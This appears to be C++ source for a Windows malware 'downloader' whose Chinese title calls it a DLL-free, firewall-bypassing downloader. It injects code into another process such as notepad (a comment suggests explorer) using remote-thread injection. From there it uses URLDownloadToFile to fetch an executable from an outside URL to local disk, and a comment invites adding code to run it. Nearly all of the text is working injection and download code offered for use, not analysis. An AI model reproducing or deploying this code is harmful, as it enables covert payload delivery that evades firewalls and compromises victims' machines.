无ＤＬＬ 穿防火墙下载者

#include <windows.h>
#define MAXINJECTSIZE (1024*4)

struct tagDownInfo
{
 TCHAR szUrl[500];
 TCHAR szFile[500];
 TCHAR szUrlmon[30];
 TCHAR szUrlDowndToFile[30];
 TCHAR szMessageBox[500];
 TCHAR szUser32_lib[10];
 bool bIsRun;
 DWORD dwRunMode;
 FARPROC funFunGetModuleHandleAddr;
 FARPROC funFunGetProcAddressAddr;
 FARPROC funFunLoadLibraryAddr;

};

bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId);

DWORD WINAPI ThreadDown(LPVOID lParam)
{

 tagDownInfo* pInfo = (tagDownInfo*)lParam;
 typedef long (__stdcall* T_MessageBox)(HWND,LPCTSTR,LPCTSTR,DWORD);
 typedef long (__stdcall* T_URLDownloadToFile)(LPVOID,LPCTSTR,LPCTSTR,DWORD, LPVOID );

 typedef HMODULE  (__stdcall* T_GetProcAddress)(HMODULE ,LPCSTR);
 typedef HMODULE  (__stdcall* T_GetModuleHandle)(LPCTSTR);
 typedef HMODULE  (__stdcall* T_LoadLibrary)(LPCTSTR);
 typedef void (__stdcall* pSleep)( DWORD dwMilliseconds);

 //三个重要的函数地址
 T_GetModuleHandle pGetModuleHandle = (T_GetModuleHandle)pInfo->funFunGetModuleHandleAddr; 
 T_GetProcAddress  pGetProcAddress = (T_GetProcAddress)pInfo->funFunGetProcAddressAddr;    
 T_LoadLibrary pLoadLibrary = (T_LoadLibrary)pInfo->funFunLoadLibraryAddr;

 HMODULE hUser32Dll = pLoadLibrary(pInfo->szUser32_lib );
 T_MessageBox pMessageBox =(T_MessageBox)pGetProcAddress(hUser32Dll, pInfo->szMessageBox);
 pMessageBox(NULL,  pInfo->szUrl, pInfo->szFile, 0);
 HMODULE hDll = pLoadLibrary( pInfo->szUrlmon );

 T_URLDownloadToFile pURLDownloadToFile = (T_URLDownloadToFile)pGetProcAddress( hDll, pInfo->szUrlDowndToFile);
 pURLDownloadToFile(NULL, pInfo->szUrl, pInfo->szFile, 0, NULL);

 return 0;
}

bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId)
{
 HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
 if(hProcess == NULL)
  return false;

 HINSTANCE hLibDll = GetModuleHandle("Kernel32.dll");

 pInfo->funFunGetProcAddressAddr = (FARPROC)GetProcAddress(hLibDll, "GetProcAddress");
 pInfo->funFunGetModuleHandleAddr = (FARPROC)GetProcAddress(hLibDll, "GetModuleHandleA");
 pInfo->funFunLoadLibraryAddr=(FARPROC)GetProcAddress(hLibDll, "LoadLibraryA");

 lstrcpy(pInfo->szUrlmon, "Urlmon.dll");
 lstrcpy(pInfo->szUrlDowndToFile, "URLDownloadToFileA");
 lstrcpy(pInfo->szMessageBox, "MessageBoxA");
 lstrcpy(pInfo->szUser32_lib, "User32.dll");

 //分配空间
 void *pRemoteThread = VirtualAllocEx(hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (! pRemoteThread)
  return false;
 tagDownInfo *pData = (tagDownInfo*)VirtualAllocEx(hProcess, 0, sizeof (tagDownInfo), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (!pData)
  return false;

 if (! WriteProcessMemory(hProcess, pRemoteThread, &ThreadDown, MAXINJECTSIZE, 0))
  return false;

 if (! WriteProcessMemory(hProcess, pData, pInfo, sizeof (tagDownInfo), 0))
  return false;

 bool bRet = true;
 HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, NULL);
 if(!hThread)
  bRet = false;

 WaitForSingleObject(hThread, INFINITE);
 VirtualFreeEx(hProcess, pRemoteThread, MAXINJECTSIZE, MEM_RELEASE);
 VirtualFreeEx(hProcess, pData, sizeof (tagDownInfo), MEM_RELEASE);
 //自己加上运行程序的代码即可   在其他线程运行也可以就是多加加载  shell32.dll 即可
 CloseHandle(hThread);
 CloseHandle(hProcess);

 return bRet;
}

 #include <windows.h>
#include "HideDownFile.CPP"
#include "conio.h"

int main(int argc, char* argv[])
{
 // ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
 HWND hWnd = FindWindow("notepad", NULL); // 以NOTEPAD为例  修改下即可插入 explorer
 DWORD dwProcessId;
 ::GetWindowThreadProcessId(hWnd, &dwProcessId);
 tagDownInfo info;
 ZeroMemory(&info, sizeof(tagDownInfo));
 strcpy(info.szFile, "e://1.exe");
 strcpy(info.szUrl, "http://www.shineway.com/aspnet/adsl.exe");
 HideDownFile(&info, dwProcessId);
 return 0;
}